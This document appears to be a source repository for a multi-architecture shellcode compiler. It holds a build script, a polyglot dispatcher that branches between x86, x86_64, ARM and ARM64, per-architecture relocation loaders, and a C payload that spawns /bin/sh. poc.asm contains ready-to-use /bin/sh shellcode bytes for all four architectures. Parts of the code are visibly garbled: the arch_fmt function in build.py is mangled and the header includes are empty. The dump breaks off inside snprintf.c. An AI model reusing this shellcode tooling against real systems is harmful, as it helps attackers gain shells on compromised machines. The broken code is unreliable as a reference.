[ { "path": "README.md", "content": "# Cross Arch Shellcode Compiler\n\n2016 - ixty\n\n## Information\nThis program allows to build portable, architecture independant shellcode from C code.\nIt currently supports the following architectures:\n- x86\n- x86_64\n- arm\n- arm_64\n\nIt works by:\n- compiling the same C code for each architecture\n- linking it to arch specific syscall implementation\n- using a polyglot dispatching shellcode\n\nThe final layout of the output binary is:\n [ DISPATCHER ]\n [ X86 BLOCK ]\n [ X86_64 BLOCK ]\n [ ARM BLOCK ]\n [ ARM_64 BLOCK ]\n\nThe dispatcher is in stage0\nOpen [stage0/README](./stage0/README) for information on how it works\n\nEach arch specific block has the following layout:\n\n [ LOADER ]\n [ RELOC NUM ]\n [ RELOC 0 ]\n [ RELOC 1 ]\n ...\n [ RELOC N ]\n [ START OFF ]\n [ CODE ]\n\nOpen [stage1/README](./stage1/README) for information on loaders\n\nThe final payload code is the stage2.\nOpen [stage2/README](./stage2/README) for information on the payload\n\n\n## Dependencies\n\n- python2.7\n- nasm\n- gcc\n- pyelftools (pip install pyelftools)\n- qemu-user-static\n- qemu-utils\n- arm chroot with gcc\n- arm64 chroot with gcc\n\n#### Assuming you use debian:\n\n```\n# apt-get install gcc nasm python2.7 python-pip\n# apt-get install qemu qemu-user-static qemu-utils binfmt-support debootstrap\n# qemu-debootstrap --arch=arm64 jessie /opt/arm64/ http://ftp.debian.org/debian\n# qemu-debootstrap --arch=armhf jessie /opt/armhfxx/ http://ftp.debian.org/debian\n\n# chroot /opt/arm64\n# apt-get install gcc\n# exit\n\n# chroot /opt/armhf\n# apt-get install gcc\n# exit\n```\n\n## Running & testing\n\n`$ ./build.py`\n\nIf everything goes well, it creates ./ouput which is the portable multi-arch shellcode.\n\nTo test that everything works, use the provided 'sc' utility:\n```\nOn the local x86_64 machine\nuser@x86_64-box $ ./sc_86 ./output\nuser@x86_64-box $ ./sc_x86_64 ./output\n... And in the chroots for arm/arm64\nuser@armhf-chroot $ ./sc_arm ./output\nuser@arm64-chroot $ ./sc_arm_64 ./output\n```\n\n## Credits\nThanks to feliam\n> https://github.com/feliam/mkShellcode\n\n> http://blog.binamuse.com/2013/01/about-shellcodes-in-c.html\n \nThe x86 / x86_64 loader code is taken from this project and the shellcode extraction technique is based upon his work aswell.\n\n\n" }, { "path": "build.py", "content": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# 2016 - ixty\n#\n# this python program will build all stages of our code and manually\n# link everything together to produce a single binary blob\n# this blob can be ran on linux on either x86 x86_64 arm arm_64\n# the final payload is written in C in stage2\n\nimport os, sys, struct, subprocess\nfrom elftools.elf.elffile import ELFFile\n\n# gcc compilation options that are common for all architectures\n# basically, we want an executable with no BS and relocation information\ncommon_opts = ' -nostdlib \\\n -fno-builtin \\\n -fno-common \\\n -fno-stack-protector \\\n -fomit-frame-pointer \\\n -fno-exceptions \\\n -fno-asynchronous-unwind-tables \\\n -fno-unwind-tables \\\n -s \\\n -pie \\\n -I./hdr '\n\n# list of files compiled into our portable polyglot\n# src/syscall_(ARCH)_.c is automatically added to that list\ncommon_files = [\n 'stage2/main.c',\n # 'stage2/snprintf.c',\n # 'stage2/utils.c',\n]\n\n# supported architectures\n# with:\n# enabled/disabled\n# specific compilation flags\n# command to build loader\n# chroot to cross compile ( https://wiki.debian.org/Arm64Qemu )\n# extra gcc options at the end of the cmd\narchs = {\n 'x86': {\n 'enabled': 1,\n 'opts': '-m32',\n 'as': [ 'as', '-32', '-o', 'stage1_bins/x86.o', 'stage1/x86.s' ],\n 'chroot': None,\n 'extra': ''\n },\n 'x86_64': {\n 'enabled': 1,\n 'opts': '-mcmodel=large',\n 'as': [ 'as', '-64', '-o', 'stage1_bins/x86_64.o', 'stage1/x86_64.s' ],\n 'chroot': None,\n 'extra': ''\n },\n 'arm': {\n 'enabled': 1,\n 'opts': '-mword-relocations',\n 'as': [ 'as', '-o', 'stage1_bins/arm.o', 'stage1/arm.s' ],\n 'chroot': '/opt/armhf/',\n 'extra': ' -lgcc'\n },\n 'arm_64': {\n 'enabled': 1,\n 'opts': '-mcmodel=large',\n 'as': [ 'as', '-o', 'stage1_bins/arm_64.o', 'stage1/arm_64.s' ],\n 'chroot': '/opt/arm64/',\n 'extra': ''\n }\n}\n\n# globals to store bytecode, elfs, data, ...\nloaders = {} # stage1\nbins = {} # stage2\npayloads = {} # stage1 + stage2\ntodelete = [] # list of directories to delete at exit\n\n# cleanup files\ndef make_clean():\n print '> cleaning up'\n os.system('rm -rf output stage0_bins stage1_bins stage2_bins')\n\n# assemble loaders & get their bytecode\ndef make_loaders():\n global todelete\n for a in sorted(archs.keys()):\n if not archs[a]['enabled']:\n continue\n if not archs[a]['chroot']:\n err, out = exec_cmd(archs[a]['as'])\n if err:\n fail('> [%-6s] error assembling loader' % a)\n else:\n path = archs[a]['chroot'] + '/tmp/cc/'\n os.system('mkdir -p %s' % path)\n os.system('cp -r ./* %s' % path)\n todelete += [path]\n\n if exec_chroot(archs[a]['chroot'], 'cd /tmp/cc && %s' % ' '.join(archs[a]['as'])):\n fail('> [%-6s] error assembling loader' % a)\n os.system('cp %sstage1_bins/%s.o ./stage1_bins/' % (path, a))\n\n loaders[a] = ELFFile(file('stage1_bins/%s.o' % a)).get_section_by_name('.text').data()\n print '> [%-6s] loader size %d bytes' % (a, len(loaders[a]))\n\n# build elf payload\ndef make_elfs():\n for a in sorted(archs.keys()):\n if not archs[a]['enabled']:\n continue\n\n gcc_cmd = 'gcc ' + common_opts + archs[a]['opts'] + ' -o stage2_bins/%s ' % a + ' '.join(common_files) + ' stage2/syscall_%s.c' % a + archs[a]['extra']\n gcc_cmd = clean_spaces(gcc_cmd)\n print '> [%-6s] %s' % (a, gcc_cmd)\n\n if not archs[a]['chroot']:\n err, out = exec_cmd(gcc_cmd.split(' '))\n if err:\n print out\n fail('> [%-6s] error compiling elf' % a)\n else:\n path = archs[a]['chroot'] + '/tmp/cc/'\n # folder is already copied for loaders building\n\n if exec_chroot(archs[a]['chroot'], 'cd /tmp/cc && %s' % gcc_cmd):\n fail('> [%-6s] error compiling elf' % a)\n os.system('cp %sstage2_bins/%s ./stage2_bins/' % (path, a))\n\n# for each arch, merge loader, relocs & code into a standalone arch specific 'payload'\ndef make_payloads():\n for a in sorted(archs.keys()):\n if not archs[a]['enabled']:\n continue\n get_payload(a)\n payloads[a] = loaders[a] + bins[a]\n with open('stage0_bins/%s' % a, 'wb+') as f:\n f.write(payloads[a])\n\n# this function loads an ELF file,\n# extracts code, data & relocs from it\n# remaps sections (to prevent empty zero-pad spaces)\n# concatenates relocation offsets, start address & elf code/data\ndef get_payload(a):\n print '> [%-6s] loading elf file' % a\n elf = ELFFile(file('stage2_bins/%s' % a))\n secs = []\n relocs = []\n vaddr_min = -1\n vaddr_remap = 0\n bytebuf = ''\n\n # parse elf sections\n for s in elf.iter_sections():\n if s.name in [ '.text', '.data', '.bss', '.rodata' ]:\n # add interesting sections to our list\n secs += [{\n 'addr': s.header.sh_addr,\n 'name': s.name,\n 'data': s.data(),\n 'size': len(s.data()),\n 'remap': vaddr_remap\n }]\n # get min section vaddr\n if vaddr_min < 0 or s.header.sh_addr < vaddr_min:\n vaddr_min = s.header.sh_addr\n # next section remap\n vaddr_remap += len(s.data())\n\n # get relocation info\n if 'iter_relocations' in dir(s):\n for r in s.iter_relocations():\n # arm 64 relocs handle differently\n if r['r_info_type'] == 1027:\n relocs += [ (r['r_offset'], r['r_addend']) ]\n else:\n relocs += [ (r['r_offset'], 0) ]\n\n # list selected sections\n for s in secs:\n print ' [%-8s] addr 0x%x size 0x%x remapping to 0x%x' % (s['name'], s['addr'], s['size'], s['remap'])\n\n # patch relocs to our new mapping & add relocs to bytebuff\n bytebuf += pack_word(elf.elfclass, len(relocs))\n for (r, addend) in relocs:\n addr = get_word(secs, r, elf.elfclass) # address pointed to by reloc\n if not addr and addend: # only happens in arm_64 for now\n addr = addend\n sec = get_section(secs, addr) # section pointed to by reloc\n naddr = remap_addr(secs, addr) # new address after our remapping\n rr = remap_addr(secs, r) # new reloc address after our remapping\n put_word(secs, r, elf.elfclass, naddr)\n # print 'reloc @ 0x%x (0x%x) in %s 0x%x (0x%x)' % (r, rr, sec['name'], addr, naddr)\n bytebuf += pack_word(elf.elfclass, rr)\n\n # add entry point\n print ' > entry point 0x%x (0x%x)' % (elf.header.e_entry, remap_addr(secs, elf.header.e_entry))\n bytebuf += pack_word(elf.elfclass, remap_addr(secs, elf.header.e_entry))\n\n # add sections data\n for s in secs:\n bytebuf += s['data']\n\n bins[a] = bytebuf\n\n# make the final binary with the differents archs payloads\ndef make_final():\n asm = ''\n with open('stage0/init.asm', 'rb') as f:\n asm = f.read()\n\n for a in sorted(archs.keys()):\n if archs[a]['enabled']:\n pay, buf = payloads[a], 'db '\n else:\n pay, buf = '', ''\n\n for i in range(len(pay)):\n buf += '0x%.2x' % ord(pay[i])\n if i != len(pay) - 1:\n buf += ', '\n\n asm = asm.replace('__payload_%s__' % a, buf)\n\n with open('stage0_bins/final.asm', 'wb+') as f:\n f.write(asm)\n\n print '> assembling final binary'\n err, out = exec_cmd(['nasm', '-o', 'stage0_bins/final', 'stage0_bins/final.asm'])\n if err:\n print out\n fail('> error assembling final binary')\n\n os.system('cp stage0_bins/final ./output')\n print '> saving final binary to ./output'\n print '> test with:'\n print ' ./tools/sc_x86 ./output'\n print ' ./tools/sc_x86_64 ./output'\n print ' ./tools/sc_arm ./output'\n print ' ./tools/sc_arm_64 ./output'\n\n# get word size & int packing format based on arch class\ndef arch_fmt(cls):\n if cls == 32:\n size = 4\n fmt = ' unknown elf class'\n sys.exit(1)\n return (size, fmt)\n\n# find a section that contains specified vaddr\ndef get_section(secs, addr):\n for s in secs:\n if addr >= s['addr'] and addr < s['addr'] + s['size']:\n return s\n return None\n\n# read word from section at specified vaddr\ndef get_word(secs, addr, cls):\n size, fmt = arch_fmt(cls)\n b = get_bytes(secs, addr, size)\n return struct.unpack(fmt, b)[0]\n\n# write word from section at specified vaddr\ndef put_word(secs, addr, cls, word):\n size, fmt = arch_fmt(cls)\n s = get_section(secs, addr)\n s['data'] = s['data'][0: addr - s['addr']] + struct.pack(fmt, word) + s['data'][addr - s['addr'] + size : ]\n\n# pack an int for specific arch\ndef pack_word(cls, word):\n size, fmt = arch_fmt(cls)\n return struct.pack(fmt, word)\n\n# get bytes from vaddr\ndef get_bytes(secs, addr, size):\n for s in secs:\n if addr >= s['addr'] and addr < s['addr'] + s['size']:\n return s['data'][addr - s['addr'] : addr - s['addr'] + size]\n return None\n\n# calculate the new vaddr after our section packing\ndef remap_addr(secs, addr):\n s = get_section(secs, addr)\n return addr + s['remap'] - s['addr']\n\n# abort\ndef fail(msg):\n print msg\n sys.exit(-1)\n\n# utility to launch a cmd & get its output\ndef exec_cmd(cmd, env=None, cwd=None):\n try:\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd, env=env)\n p.wait()\n return (p.returncode, p.stdout.read() + p.stderr.read())\n except:\n return (-1, '')\n\n# utility to launch a cmd in a chroot\ndef exec_chroot(chroot, cmd, input=None):\n if input is not None:\n if subprocess.call('echo \"%s\" | chroot %s /bin/sh -c \\'%s\\'' % (input, chroot, cmd), shell=True):\n return -1\n return 0\n else:\n if subprocess.call('chroot %s /bin/sh -c \\'%s\\'' % (chroot, cmd), shell=True):\n return -1\n return 0\n\n# remove extra spaces\ndef clean_spaces(s):\n while s.find(' ') >= 0:\n s = s.replace(' ', ' ')\n return s\n\n# main\nif __name__ == '__main__':\n arg = '' if len(sys.argv) == 1 else sys.argv[1]\n\n if arg == 'clean':\n make_clean()\n else:\n os.system('mkdir -p stage0_bins')\n os.system('mkdir -p stage1_bins')\n os.system('mkdir -p stage2_bins')\n make_loaders()\n make_elfs()\n make_payloads()\n make_final()\n # delete temp files in chroots\n os.system('rm -rf %s' % ' '.join(todelete))\n\n" }, { "path": "stage0/README", "content": "2016 - ixty\n\nstage0 contains a shellcode that can be successfully executed by the following architectures:\n - x86\n - x86_64\n - arm (little endian)\n - arm_64 (aarch64) (little endian)\n\nTo make it work we need:\n - 4 bytes that translate to:\n - valid opcodes for arm, arm64 and x86\n - that evaluate to a jump in x86\n - that are functional nops in both arms (aka no load / store & no touching of PC / LR / stack)\n - 4 more bytes that translate to:\n - valid opcodes for arm and arm64\n - evaluate to a jump in arm\n - functionnal nop for arm64\n\nFor the x86 / arm branching we use the following:\n0xEB 0xXX 0x00 0x32 (with XX being the offset to x86 code)\n arm andlo r0, r0, #0xeb000\n arm64 orr w11, w23, #7\n x86 jmp $+0xa / junk\n x86_64 jmp $+0xa / junk\n\nFor the arm / arm64 branching we use:\n0xXX 0xXX 0xXX 0xEA\n arm b XXX\n arm64 ands x1, x0, x0\n\n(exact decoded instructions will change based on the offset values)\n\nWe differenciate between x86 32 and 64 bits by using the REX + NOP / INC trick.\nAfter that we just jump to arch specific payloads.\n\nYou can use the poc.asm to get a /bin/sh shellcode compatible with all those archs (it contains nulls thought)\n" }, { "path": "stage0/init.asm", "content": "; 2016 - ixty\n; multi-arch linux /bin/sh shellcode\n; works on:\n; x86\n; x86_64\n; arm\n; arm_64\n; tested on debian jessie\n\n; compile with nasm\nbits 32\n_start:\n\n; ======================================================================= ;\n; init, polyglot shellcode for arm, arm64, x86, x86_64\n; branches out to specific arch dependent payloads\n; ======================================================================= ;\n\n; arm andlo r0, r0, #0xeb000\n; arm64 orr w11, w23, #7\n; x86 jmp $+0xa / junk\n; x86_64 jmp $+0xa / junk\n db 0xeb, (_x86 - $ - 2), 0x00, 0x32\n; arm b _arm ($+0x10)\n; arm64 ands x1, x0, x0\n db ((_arm - $ - 8) / 4) % 0x100, ((_arm - $ - 8) / 4) / 0x100, 0x00, 0xea\n; arm64 b _arm64 ($+0x14)\n db ((_arm64 - $) / 4) % 0x100, ((_arm64 - $) / 4) / 0x100, 0x00, 0x14\n\n\n; ======================================================================= ;\n; x86 only, detect 32/64 bits\n; ======================================================================= ;\n_x86:\n; x86 xor eax, eax;\n; x86_64 xor eax, eax;\n xor eax, eax\n; x86 inc eax\n; x86_64 REX + nop\n db 0x40\n nop\n jz _x86_64\n\n\n; ======================================================================= ;\n; PAYLOADs\n; ======================================================================= ;\n_x86_32:\n __payload_x86__\n\n_x86_64:\n __payload_x86_64__\n times (4 - (($ - _start) % 4)) nop ; must be 4b aligned\n_arm:\n __payload_arm__\n times (4 - (($ - _start) % 4)) nop ; must be 4b aligned\n_arm64:\n __payload_arm_64__\n" }, { "path": "stage0/poc.asm", "content": "; 2016 - ixty\n; multi-arch linux /bin/sh shellcode\n; works on:\n; x86\n; x86_64\n; arm\n; arm_64\n; tested on debian jessie\n\n; compile with nasm\nbits 32\n_start:\n\n; ======================================================================= ;\n; init, polyglot shellcode for arm, arm64, x86, x86_64\n; branches out to specific arch dependent payloads\n; ======================================================================= ;\n\n; arm andlo r0, r0, #0xeb000\n; arm64 orr w11, w23, #7\n; x86 jmp $+0xa / junk\n; x86_64 jmp $+0xa / junk\n db 0xeb, (_x86 - $ - 2), 0x00, 0x32\n; arm b _arm ($+0x10)\n; arm64 ands x1, x0, x0\n db ((_arm - $ - 8) / 4), 0x00, 0x00, 0xea\n; arm64 b _arm64 ($+0x14)\n db ((_arm64 - $) / 4), 0x00, 0x00, 0x14\n\n\n; ======================================================================= ;\n; x86 only, detect 32/64 bits\n; ======================================================================= ;\n_x86:\n; x86 xor eax, eax;\n; x86_64 xor eax, eax;\n xor eax, eax\n; x86 inc eax\n; x86_64 REX + nop\n db 0x40\n nop\n jz _x86_64\n\n\n; ======================================================================= ;\n; PAYLOADs\n; ======================================================================= ;\n_x86_32:\n ; /bin/sh shellcode\n db 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80\n\n_x86_64:\n ; /bin/sh shellcode\n db 0x31, 0xc0, 0x48, 0xbb, 0xd1, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0xff, 0x48, 0xf7, 0xdb, 0x53, 0x54, 0x5f, 0x99, 0x52, 0x57, 0x54, 0x5e, 0xb0, 0x3b, 0x0f, 0x05\n\n times (4 - (($ - _start) % 4)) nop ; must be 4b aligned\n_arm:\n ; /bin/sh shellcode\n db 0x01, 0x30, 0x8f, 0xe2, 0x13, 0xff, 0x2f, 0xe1, 0x78, 0x46, 0x08, 0x30, 0x49, 0x1a, 0x92, 0x1a, 0x0b, 0x27, 0x01, 0xdf, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00\n\n times (4 - (($ - _start) % 4)) nop ; must be 4b aligned\n_arm64:\n ; /bin/sh shellcode\n db 0x00, 0x00, 0x00, 0x90, 0xa0, 0x00, 0x00, 0x10, 0x02, 0x00, 0x80, 0xd2, 0x01, 0x00, 0x80, 0xd2, 0xa8, 0x1b, 0x80, 0xd2, 0x01, 0x00, 0x00, 0xd4, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00\n" }, { "path": "stage1/README", "content": "2016 - ixty\n\nstage1 contains arch specific assembler code that act as 'loaders'\nEach loader is pretty simple, it consists of a few instructions that:\n - get current PC\n - read & patch relocation information in the binary code that follows the loader\n - jump to code 'entry point'\n\nThose loaders assume that the memory layout is the following:\n\n[loader code] [num relocs] [reloc1] [reloc2] ... [relocN] [start addr offset] [code]\n\nThe loader assumes that the code is zero-mapped which is to say that the first instruction thinks its own address is 0\nThe script build.py remaps the original section addresses to reflect that.\n" }, { "path": "stage1/arm.s", "content": "# ARM Loader\n\n# getpc\n.section .text\n\n # ptr to reloc num into r0\n adrl r0, relocs\n # number of relocs into r1\n ldr r1, [r0]\n\n # begining of relocs in r2\n add r2, r0, #4\n\n # start addr in r3\n mov r5, #4\n mul r4, r1, r5\n add r4, r2, r4\n ldr r3, [r4]\n\n # begining of code in r4\n add r4, r4, #4\n\n# fix relocs loop\nloop:\n cmp r1, #0\n beq done\n\n # reloc addr in r0\n ldr r0, [r2]\n # reloc data ptr in r0\n add r0, r4, r0\n # data in r5\n ldr r5, [r0]\n # remap reloc\n add r5, r4, r5\n # store remapped reloc data\n str r5, [r0]\n\n # decrement number of relocs to process\n sub r1, r1, #1\n # go to next reloc\n add r2, r2, #4\n b loop\n\ndone:\n add r4, r3, r4\n bx r4\n .align 4\n\nrelocs:\n" }, { "path": "stage1/arm_64.s", "content": "# ARM64 Loader\n\n# getpc\n.section .text\n\n # ptr to reloc num into x0\n adr x0, relocs\n # number of relocs into x1\n ldr x1, [x0]\n\n # begining of relocs in x2\n add x2, x0, #8\n\n # start addr in x3\n mov x5, #8\n mul x4, x1, x5\n add x4, x2, x4\n ldr x3, [x4]\n\n # begining of code in x4\n add x4, x4, #8\n\n# fix relocs loop\nloop:\n cmp x1, #0\n beq done\n\n # reloc addr in x0\n ldr x0, [x2]\n # reloc data ptr in x0\n add x0, x4, x0\n # data in x5\n ldr x5, [x0]\n # remap reloc\n add x5, x4, x5\n # store remapped reloc data\n str x5, [x0]\n\n # decrement number of relocs to process\n sub x1, x1, #1\n # go to next reloc\n add x2, x2, #8\n b loop\n\ndone:\n add x4, x3, x4\n br x4\n .align 4\n\nrelocs:\n" }, { "path": "stage1/x86.s", "content": "# x86 Loader\n\n# getpc\n.section .text\n jmp getpc1\ngetpc2:\n jmp begin\ngetpc1:\n call getpc2\n\n# loader code\nbegin:\n popl %esi\n subl $(begin-relocs), %esi\n\n # esi now relocs\n movl (%esi), %ecx # get num relocs\n leal 8(%esi,%ecx,4), %edi # start of code\n andl %ecx, %ecx\n jz done\n\n# fix relocs loop\nfix_reloc:\n movl (%esi,%ecx,4), %eax\n addl %edi, (%edi,%eax,1)\n dec %ecx\n jne fix_reloc\n\n# start shellcode now\ndone:\n addl -4(%edi), %edi\n jmp *%edi\n\n.align 4\n\nrelocs:\n# [num_relocs 4b] [relocs 4b * N] [start 4b] [code xB]\n" }, { "path": "stage1/x86_64.s", "content": "# x86_64 Loader\n\n# getpc\n.section .text\n jmp getpc1\ngetpc2:\n jmp begin\ngetpc1:\n call getpc2\n\n# loader code\nbegin:\n popq %rsi\n subq $(begin-relocs), %rsi\n\n # esi now relocs\n movq (%rsi), %rcx # get num relocs\n leaq 16(%rsi,%rcx,8), %rdi # start of code\n andq %rcx, %rcx\n jz done\n\n# fix relocs loop\nfix_reloc:\n movq (%rsi,%rcx,8), %rax\n addq %rdi, (%rdi,%rax,1)\n dec %rcx\n jne fix_reloc\n\n# start shellcode now\ndone:\n addq -8(%rdi), %rdi\n jmpq *%rdi\n\n.align 8\n\nrelocs:\n# [num_relocs 4b] [relocs 4b * N] [start 4b] [code xB]\n" }, { "path": "stage2/README", "content": "2016 - ixty\n\nstage2 is the final payload code.\nIt is written in C once and will be compiled for all supported architectures.\n\nThe architecture specific code is in the syscall_*.c/h files that implement linux syscalls.\n\nDont forget to edit build.py if you add more c files to be compiled.\n\n\n" }, { "path": "stage2/linuxdefs.h", "content": "#ifndef _SYMB_LINUX_DEFS_H\n#define _SYMB_LINUX_DEFS_H\n\n#include \n#include \n\n#define ssize_t long\n#define size_t unsigned long\n\n#define O_RDONLY 00\n#define O_WRONLY 01\n#define O_RDWR 02\n#define O_CREAT 0100\n#define O_TRUNC 01000\n#define O_APPEND 02000\n\n\n#define F_DUPFD 0\n#define F_GETFD 1\n#define F_SETFD 2\n#define F_GETFL 3\n#define F_SETFL 4\n\n\n#define SEEK_SET 0\n#define SEEK_CUR 1\n#define SEEK_END 2\n\n\n#define PROT_READ 0x1\n#define PROT_WRITE 0x2\n#define PROT_EXEC 0x4\n#define PROT_NONE 0x0\n#define MAP_SHARED 0x01\n#define MAP_PRIVATE 0x02\n#define MAP_TYPE 0x0f\n#define MAP_FIXED 0x10\n#define MAP_ANONYMOUS 0x20\n\n#endif\n" }, { "path": "stage2/main.c", "content": "// #include \"utils.h\"\n\nvoid _start()\n{\n // simple /bin/sh shellcode\n _execve(\"/bin/sh\", NULL, NULL);\n\n // // test a few of the syscalls\n // printf(\"> _start @ 0x%llx\\n\", _start);\n // void * mem = _mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n // printf(\"> hello, mem @ 0x%llx\\n\", mem);\n // *(int*)mem = 1;\n // _exit(3);\n}\n" }, { "path": "stage2/snprintf.c", "content": "/****************************************************************************\n\n Copyright (c) 1999,2000 WU-FTPD Development Group.\n All rights reserved.\n\n Portions Copyright (c) 1980, 1985, 1988, 1989, 1990, 1991, 1993, 1994\n The Regents of the University of California.\n Portions Copyright (c) 1993, 1994 Washington University in Saint Louis.\n Portions Copyright (c) 1996, 1998 Berkeley Software Design, Inc.\n Portions Copyright (c) 1989 Massachusetts Institute of Technology.\n Portions Copyright (c) 1998 Sendmail, Inc.\n Portions Copyright (c) 1983, 1995, 1996, 1997 Eric P. Allman.\n Portions Copyright (c) 1997 by Stan Barber.\n Portions Copyright (c) 1997 by Kent Landfield.\n Portions Copyright (c) 1991, 1992, 1993, 1994, 1995, 1996, 1997\n Free Software Foundation, Inc.\n\n Use and distribution of this software and its source code are governed\n by the terms and conditions of the WU-FTPD Software License (\"LICENSE\").\n\n If you did not receive a copy of the license, it may be obtained online\n at http://www.wu-ftpd.org/license.html.\n\n $Id: snprintf.c,v 1.1 2001/07/06 19:23:39 scut Exp $\n\n****************************************************************************/\n\n#ifndef __P\n#define __P(p) p\n#endif\n\n#include \n#define VA_LOCAL_DECL\tva_list ap;\n#define VA_START(f)\tva_start(ap, f)\n#define VA_END\t\tva_end(ap)\n\n#ifdef SOLARIS2\n#ifdef _FILE_OFFSET_BITS\n#define SOLARIS26\n#endif\n#endif\n\n#ifdef SOLARIS26\n#define HAS_SNPRINTF\n#define HAS_VSNPRINTF\n#endif\n#ifdef _SCO_DS_\n#define HAS_SNPRINTF\n#endif\n#ifdef luna2\n#define HAS_VSNPRINTF\n#endif\n/*\n ** SNPRINTF, VSNPRINT -- counted versions of printf\n **\n ** These versions have been grabbed off the net. They have been\n ** cleaned up to compile properly and support for .precision and\n ** %lx has been added.\n */\n\n/**************************************************************\n * Original:\n * Patrick Powell Tue Apr 11 09:48:21 PDT 1995\n * A bombproof version of doprnt (dopr) included.\n * Sigh. This sort of thing is always nasty do deal with. Note that\n * the version here does not include floating point...\n *\n * snprintf() is used instead of sprintf() as it does limit checks\n * for string length. This covers a nasty loophole.\n *\n * The other functions are there to prevent NULL pointers from\n * causing nast effects.\n **************************************************************/\n\n/*static char _id[] = \"$Id: snprintf.c,v 1.1 2001/07/06 19:23:39 scut Exp $\"; */\nstatic void dopr(char *, const char *, va_list);\nstatic char *end;\n\n#ifndef HAS_VSNPRINTF\nint vsnprintf(char *str, int count, const char *fmt, va_list args)\n{\n int\tn = 0;\n str[0] = 0;\n end = str + count - 1;\n dopr(str, fmt, args);\n if (count > 0)\n\tend[0] = 0;\n while (*str++)\n\t n++;\n return n;\n}\n\n#ifndef HAS_SNPRINTF\n/* VARARGS3 */\nint snprintf(char *str, int count, const char *fmt,...)\n{\n int len;\n VA_LOCAL_DECL\n\n\tVA_START(fmt);\n len = vsnprintf(str, count, fmt, ap);\n VA_END;\n return len;\n}\n#endif\n\n/*\n * dopr(): poor man's version of doprintf\n */\n\nstatic void fmtstr __P((char *value, int ljust, int len, int zpad, int maxwidth));\nstatic void fmtnum __P((long value, int base, int dosign, int ljust, int len, int zpad));\nstatic void dostr __P((char *, int));\nstatic char *output;\nstatic void dopr_outch __P((int c));\n\nstatic void dopr(char *buffer, const char *format, va_list args)\n{\n int ch;\n long value;\n int longflag = 0;\n int pointflag = 0;\n int maxwidth = 0;\n char *strvalue;\n int ljust;\n int len;\n int zpad;\n\n output = buffer;\n while ((ch = *format++)) {\n\tswitch (ch) {\n\tcase '%':\n\t ljust = len = zpad = maxwidth = 0;\n\t longflag = pointflag = 0;\n\t nextch:\n\t ch = *format++;\n\t switch (ch) {\n\t case 0:\n\t\tdostr(\"**end of format**\", 0);\n\t\treturn;\n\t case '-':\n\t\tljust = 1;\n\t\tgoto nextch;\n\t case '0':\t\t/* set zero padding if len not set */\n\t\tif (len == 0 && !pointflag)\n\t\t zpad = '0';\n\t case '1':\n\t case '2':\n\t case '3':\n\t case '4':\n\t case '5':\n\t case '6':\n\t case '7':\n\t case '8':\n\t case '9':\n\t\tif (pointflag)\n\t\t maxwidth = maxwidth * 10 + ch - '0';\n\t\telse\n\t\t len = len * 10 + ch - '0';\n\t\tgoto nextch;\n\t case '*':\n\t\tif (pointflag)\n\t\t maxwidth = va_arg(args, int);\n\t\telse\n\t\t len = va_arg(args, int);\n\t\tgoto nextch;\n\t case '.':\n\t\tpointflag = 1;\n\t\tgoto nextch;\n\t case 'l':\n\t\tlongflag = 1;\n\t\tgoto nextch;\n\t case 'u':\n\t case 'U':\n\t\t/*fmtnum(value,base,dosign,ljust,len,zpad) */\n\t\tif (longflag) {\n\t\t value = va_arg(args, long);\n\t\t}\n\t\telse {\n\t\t value = va_arg(args, int);\n\t\t}\n\t\tfmtnum(value, 10, 0, ljust, len, zpad);\n\t\tbreak;\n\t case 'o':\n\t case 'O':\n\t\t/*fmtnum(value,base,dosign,ljust,len,zpad) */\n\t\tif (longflag) {\n\t\t value = va_arg(args, long);\n\t\t}\n\t\telse {\n\t\t value = va_arg(args, int);\n\t\t}\n\t\tfmtnum(value, 8, 0, ljust, len, zpad);\n\t\tbreak;\n\t case 'd':\n\t case 'D':\n\t\tif (longflag) {\n\t\t value = va_arg(args, long);\n\t\t}\n\t\telse {\n\t\t value = va_arg(args, int);\n\t\t}\n\t\tfmtnum(value, 10, 1, ljust, len, zpad);\n\t\tbreak;\n\t case 'x':\n\t\tif (longflag) {\n\t\t value = va_arg(args, long);\n\t\t}\n\t\telse {\n\t\t value = va_arg(args, int);\n\t\t}\n\t\tfmtnum(value, 16, 0, ljust, len, zpad);\n\t\tbreak;\n\t case 'X':\n\t\tif (longflag) {\n\t\t value = va_arg(args, long);\n\t\t}\n\t\telse {\n\t\t value = va_arg(args, int);\n\t\t}\n\t\tfmtnum(value, -16, 0, ljust, len, zpad);\n\t\tbreak;\n\t case 's':\n\t\tstrvalue = va_arg(args, char *);\n\t\tif (maxwidth > 0 || !pointflag) {\n\t\t if (pointflag && len > maxwidth)\n\t\t\tlen = maxwidth;\t\t/* Adjust padding */\n\t\t fmtstr(strvalue, ljust, len, zpad, maxwidth);\n\t\t}\n\t\tbreak;\n\t case 'c':\n\t\tch = va_arg(args, int);\n\t\tdopr_outch(ch);\n\t\tbreak;\n\t case '%':\n\t\tdopr_outch(ch);\n\t\tcontinue;\n\t default:\n\t\tdostr(\"???????\", 0);\n\t }\n\t break;\n\tdefault:\n\t dopr_outch(ch);\n\t break;\n\t}\n }\n *output = 0;\n}\n\nstatic void fmtstr(char *value, int ljust, int len, int zpad, int maxwidth)\n{\n int padlen, strlen;\t\t/* amount to pad */\n\n if (value == 0) {\n\tvalue = \"\";\n }\n for (strlen = 0; value[strlen]; ++strlen);\t/* strlen */\n if (strlen > maxwidth && maxwidth)\n\tstrlen = maxwidth;\n padlen = len - strlen;\n if (padlen < 0)\n\tpadlen = 0;\n if (ljust)\n\tpadlen = -padlen;\n while (padlen > 0) {\n\tdopr_outch(' ');\n\t--padlen;\n }\n dostr(value, maxwidth);\n while (padlen < 0) {\n\tdopr_outch(' ');\n\t++padlen;\n }\n}\n\nstatic void fmtnum(long value, int base, int dosign, int ljust, int len, int zpad)\n{\n int signvalue = 0;\n unsigned long uvalue;\n char convert[20];\n int place = 0;\n int padlen = 